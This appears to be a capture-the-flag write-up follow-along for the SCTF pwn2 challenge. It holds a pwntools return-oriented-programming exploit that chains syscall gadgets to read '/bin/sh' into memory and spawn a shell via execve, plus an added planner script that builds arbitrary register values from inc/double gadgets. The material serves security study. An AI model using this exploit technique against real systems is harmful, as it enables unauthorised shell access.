There are a lot of approaches I had not thought of.
It may be basic, but
it is a method I had not thought of:
zero out eax, ebx, ecx and edx, then
1) read() "/bin/sh" into memory, and
2) call execve. Impressive.
https://github.com/r00ta/myWriteUps/tree/master/SCTF/pwn2
[Following along]
w00t@ubuntu:~/Desktop/SCTF/pwn2$ cat a.py
from pwn import *

'''
Gadgets (from the writeup):
.text:080484D0 syscall
.text:080484D3 inc eax
.text:080484D5 inc ebx
.text:080484D7 inc ecx
.text:080484D9 inc edx
.text:08048420 mov eax, 0
.text:08048459 mov edx, 0
.text:0804849a add ecx, ecx ; ret
0x0804835d : pop ebx ; ret
'''
inc_eax = 0x080484D3
inc_ebx = 0x080484D5
inc_ecx = 0x080484D7
inc_edx = 0x080484D9
eax0 = 0x08048420        # mov eax, 0
edx0 = 0x08048459        # mov edx, 0
ecxecx = 0x0804849a      # add ecx, ecx ; ret  (shifts ecx left by one bit)
syscall = 0x080484d0
popebx = 0x0804835d

bss = 0x0804a040         # writable address that will receive "/bin/sh"

payload = b''
payload += b'A' * 48     # padding up to the saved return address

# stage 1: read(0, bss, 7)
payload += p32(eax0)                  # eax = 0
payload += p32(popebx)
payload += p32(0xffffffff)            # ebx = -1
payload += p32(inc_ebx)               # ebx = 0 (stdin)
payload += p32(inc_ecx)               # ecx: -1 -> 0 (the add chain below only lands on
                                      # 0x0804a040 if ecx starts out as 0xffffffff)
payload += p32(edx0)                  # edx = 0
payload += p32(inc_eax) * 3           # eax = 3 (SYS_read)
payload += p32(inc_edx) * 7           # edx = 7 (len("/bin/sh"))
# build ecx = 0x0804a040 bit by bit: inc sets the lowest bit, add ecx,ecx shifts left
payload += p32(inc_ecx)               # 0x1
payload += p32(ecxecx) * 9            # 0x200
payload += p32(inc_ecx)               # 0x201
payload += p32(ecxecx) * 3            # 0x1008
payload += p32(inc_ecx)               # 0x1009
payload += p32(ecxecx) * 2            # 0x4024
payload += p32(inc_ecx)               # 0x4025
payload += p32(ecxecx) * 7            # 0x201280
payload += p32(inc_ecx)               # 0x201281
payload += p32(ecxecx) * 6            # 0x0804a040
payload += p32(syscall)               # read(0, 0x0804a040, 7)

# stage 2: execve("/bin/sh", NULL, NULL)
payload += p32(eax0)
payload += p32(inc_eax) * 11          # eax = 11 (SYS_execve)
payload += p32(popebx)
payload += p32(bss)                   # ebx = &"/bin/sh"
payload += p32(ecxecx) * 30           # ecx = 0x0804a040 << 30 == 0 (argv = NULL)
payload += p32(edx0)                  # edx = 0 (envp = NULL)
payload += p32(syscall)
payload += p32(0xdeadbeef)

p = remote("localhost", 9999)
#p = process("linux_server")
p.sendlineafter(b"read?", b"-1")      # -1 at the size prompt, as in the original script
p.sendlineafter(b"data!", payload)
# stage 1 is read(0, bss, 7): type /bin/sh at the prompt to feed it, then stage 2 runs
p.interactive()
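The trick in the chain above is that `inc ecx` and `add ecx, ecx` (a shift left by one) are enough to build any 32-bit value. The script below is an added example, not part of the original writeup or the SCTF binary: it generalises the hand-written inc/double sequence into a small planner, reproduces the writeup's ecx sequence, and checks it with a simulator. Only the two gadget addresses are taken from the page; the planner, the op names and the assumption that ecx starts at 0xffffffff (the -1 entered at the "read?" prompt) are mine.

```python
"""
Build an arbitrary 32-bit register value with only `inc reg` and
`add reg, reg` gadgets, as the SCTF pwn2 chain does for ecx.
Added example; only the two gadget addresses come from the writeup.
"""
import struct

MASK32 = 0xFFFFFFFF

# Gadget addresses listed in the writeup (specific to that binary).
INC_ECX = 0x080484D7      # inc ecx ; ret
ADD_ECX_ECX = 0x0804849A  # add ecx, ecx ; ret  (same effect as shl ecx, 1)


def simulate(ops, start):
    """Run a list of 'inc' / 'dbl' operations on a 32-bit register."""
    reg = start & MASK32
    for op in ops:
        if op == "inc":
            reg = (reg + 1) & MASK32
        elif op == "dbl":
            reg = (reg << 1) & MASK32
        else:
            raise ValueError(f"unknown op {op!r}")
    return reg


def build_from_zero(target):
    """MSB-first construction: shift left, then add the next bit if it is set."""
    target &= MASK32
    ops = []
    for i in range(target.bit_length() - 1, -1, -1):
        if ops:                 # register already nonzero: make room for the next bit
            ops.append("dbl")
        if (target >> i) & 1:
            ops.append("inc")
    return ops


def plan_register(start, target):
    """Cheapest inc/dbl sequence taking the register from `start` to `target`.

    First drive the register to 0, either by inc-ing through the 32-bit
    wraparound or by doubling until every set bit has been shifted out,
    then build `target` bit by bit.  For ecx = 0xffffffff (assumed: the -1
    typed at the "read?" prompt) that is one inc followed by 32 ops, exactly
    the sequence in the writeup.
    """
    start &= MASK32
    target &= MASK32
    to_zero = []
    if start != 0:
        tz = (start & -start).bit_length() - 1   # trailing zero bits of start
        by_dbl = 32 - tz                         # doublings that shift everything out
        by_inc = (1 << 32) - start               # incs until wraparound to 0
        to_zero = ["inc"] * by_inc if by_inc < by_dbl else ["dbl"] * by_dbl
    return to_zero + build_from_zero(target)


def chain_bytes(ops, inc_gadget=INC_ECX, dbl_gadget=ADD_ECX_ECX):
    """Turn the op list into the little-endian gadget chain (one p32 per op)."""
    addr = {"inc": inc_gadget, "dbl": dbl_gadget}
    return b"".join(struct.pack("<I", addr[op]) for op in ops)


# The ecx part of stage 1, transcribed from the writeup's payload (constructed here):
# inc_ecx, inc_ecx, ecxecx*9, inc_ecx, ecxecx*3, inc_ecx, ecxecx*2,
# inc_ecx, ecxecx*7, inc_ecx, ecxecx*6
WRITEUP_ECX_OPS = (
    ["inc"] + ["inc"] + ["dbl"] * 9 + ["inc"] + ["dbl"] * 3 + ["inc"]
    + ["dbl"] * 2 + ["inc"] + ["dbl"] * 7 + ["inc"] + ["dbl"] * 6
)

if __name__ == "__main__":
    # ecx = 0xffffffff -> address of the bss buffer that will hold "/bin/sh"
    print(hex(simulate(WRITEUP_ECX_OPS, 0xFFFFFFFF)))
    ops = plan_register(0xFFFFFFFF, 0x0804A040)
    print(ops == WRITEUP_ECX_OPS, len(ops))
    # stage 2: 0x0804a040 doubled 30 times wraps to 0, giving argv = NULL
    print(hex(simulate(["dbl"] * 30, 0x0804A040)))
    # the planner does the same zeroing in 26 doublings instead of 30
    print(len(plan_register(0x0804A040, 0)))
```

The planner reproduces the writeup's 33-gadget ecx sequence exactly, and shows why 30 doublings zero ecx in stage 2: 0x0804a040 has six trailing zero bits, so 26 shifts already push every set bit out of the register.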